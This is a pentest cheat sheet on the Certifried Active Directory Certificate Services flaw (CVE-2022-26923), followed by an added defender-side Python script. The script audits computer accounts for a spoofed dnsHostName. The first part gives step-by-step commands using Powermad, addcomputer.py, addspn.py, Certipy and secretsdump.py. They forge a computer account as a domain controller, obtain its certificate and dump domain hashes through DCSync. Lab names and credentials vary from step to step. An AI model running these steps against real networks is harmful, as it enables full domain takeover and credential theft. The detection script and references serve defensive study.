Certifried

A certificate issued from the User template identifies its holder by the User Principal Name (UPN), because the template's msPKI-Certificate-Name-Flag attribute has SubjectAltRequireUpn set. The Machine template, however, identifies a computer account only by its dnsHostName attribute. That attribute can be rewritten by the account's owner, which confuses the KDC: an attacker can set it to the name of a domain controller, request a Machine certificate that the KDC then maps to the DC account instead of the legitimate computer, and use it for a DCSync attack.

1. Add a fake computer account with Powermad or addcomputer.py

# Powermad
New-MachineAccount -MachineAccount 'FakeComputer' -Password (ConvertTo-SecureString -AsPlainText -Force 'Password123') -Domain domain.local -DomainController dc.domain.local -Verbose

# impacket
addcomputer.py domain.local/john:'Passw0rd1' -method LDAPS -computer-name 'JOHNPC' -computer-pass 'Password123'

2. Clear the servicePrincipalName values that reference the account's current dnsHostName

addspn.py --clear -t 'FakeComputer$' -u 'domain\user' -p 'password' 'DC.domain.local'

3. Change the dnsHostName attribute to match the domain controller's

# RSAT
Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com

Note that steps 1-3 above can be automated with my messy script certifried.py

python3 certifried.py range.net/peter:'Welcome1234' -dc-ip 192.168.86.182

4. Request a certificate from the Machine template with Certipy

certipy req -u 'WIN-JLSLKICW6EP$' -p 'PY2nc0ubG8WT' -target ca01.range.net -ca range-CA01-CA -template Machine

5. Authenticate with the certificate requested in the previous step

certipy auth -pfx dc01.pfx -dc-ip 192.168.86.182

6. DCSync and win

secretsdump.py domain.local/dc01\$@10.10.10.10 -just-dc -hashes :000000000000000

7. It is always recommended to clean up the created computer account (this requires a privileged account)

addcomputer.py range.net/Administrator:'Password123' -computer-name 'WIN-EAZXIGMWO1T$' -computer-pass 'mi#gKKWFlzxJ' -dc-ip 192.168.86.182 -delete
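The three attribute changes in steps 1-3 (a new computer account, cleared SPNs, and a dnsHostName rewritten to a domain controller's name) are visible in the directory and can be audited. The following is an added defender-side example, not part of the original page and not from certifried.py or Certipy: it runs over a constructed list of computer objects shaped like LDAP attribute dumps and flags accounts whose dnsHostName does not match their own sAMAccountName, collides with a domain controller's dnsHostName, or that have no SPNs at all. The domain name, the sample records and the record layout are assumptions; the userAccountControl flag values are the standard ones (0x2000 SERVER_TRUST_ACCOUNT, 0x1000 WORKSTATION_TRUST_ACCOUNT).

```python
"""Audit computer accounts for dnsHostName tampering (Certifried pattern).

Added example, not part of the original page. In practice the records
would come from an LDAP query of the domain; here they are constructed.
"""
from __future__ import annotations

DOMAIN = "domain.local"  # assumed domain name for the constructed data

# Real userAccountControl flag values.
SERVER_TRUST_ACCOUNT = 0x2000       # set on domain controllers
WORKSTATION_TRUST_ACCOUNT = 0x1000  # set on member computers

# Constructed sample: one legitimate DC, one normal workstation, and one
# computer account whose dnsHostName was rewritten to the DC's name and
# whose SPNs were cleared, as in steps 1-3 of the page.
COMPUTERS = [
    {
        "sAMAccountName": "DC01$",
        "dnsHostName": "dc01.domain.local",
        "servicePrincipalName": ["HOST/dc01.domain.local", "HOST/DC01"],
        "userAccountControl": 0x80000 | SERVER_TRUST_ACCOUNT,
    },
    {
        "sAMAccountName": "WS01$",
        "dnsHostName": "ws01.domain.local",
        "servicePrincipalName": ["HOST/ws01.domain.local", "HOST/WS01"],
        "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
    },
    {
        "sAMAccountName": "FakeComputer$",
        "dnsHostName": "DC01.domain.local",
        "servicePrincipalName": [],
        "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
    },
]


def expected_dns_host_name(sam: str, domain: str) -> str:
    """The dnsHostName a computer account normally carries: <name>.<domain>."""
    return sam.rstrip("$").lower() + "." + domain.lower()


def is_domain_controller(obj: dict) -> bool:
    return bool(obj.get("userAccountControl", 0) & SERVER_TRUST_ACCOUNT)


def find_suspicious(computers: list[dict], domain: str = DOMAIN) -> list[tuple[str, list[str]]]:
    """Return (sAMAccountName, reasons) for every account that looks tampered with."""
    dc_names = {obj["dnsHostName"].lower() for obj in computers if is_domain_controller(obj)}
    findings = []
    for obj in computers:
        sam = obj["sAMAccountName"]
        dns = (obj.get("dnsHostName") or "").lower()
        reasons = []
        if dns != expected_dns_host_name(sam, domain):
            reasons.append("dnsHostName does not match sAMAccountName")
        if dns in dc_names and not is_domain_controller(obj):
            reasons.append("dnsHostName collides with a domain controller")
        if not obj.get("servicePrincipalName"):
            reasons.append("no servicePrincipalName values")
        if reasons:
            findings.append((sam, reasons))
    return findings


if __name__ == "__main__":
    for sam, reasons in find_suspicious(COMPUTERS):
        print(f"{sam}: {'; '.join(reasons)}")
```

Run against the sample, only FakeComputer$ is reported, with all three reasons. The dnsHostName collision with a DC is the condition the KDC mis-resolves; the other two checks catch the preparatory steps even when an attacker has not yet picked a DC name. Computers renamed legitimately will also trip the first check, so treat it as a triage signal rather than a verdict.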

For a detailed explanation of the vulnerability (CVE-2022-26923), you may read the full article here

ADCS References

  1. https://luemmelsec.github.io/Skidaddle-Skideldi-I-just-pwnd-your-PKI/
  2. https://www.thehacker.recipes/ad/movement/ad-cs/
  3. https://mayfly277.github.io/posts/GOADv2-pwning-part6/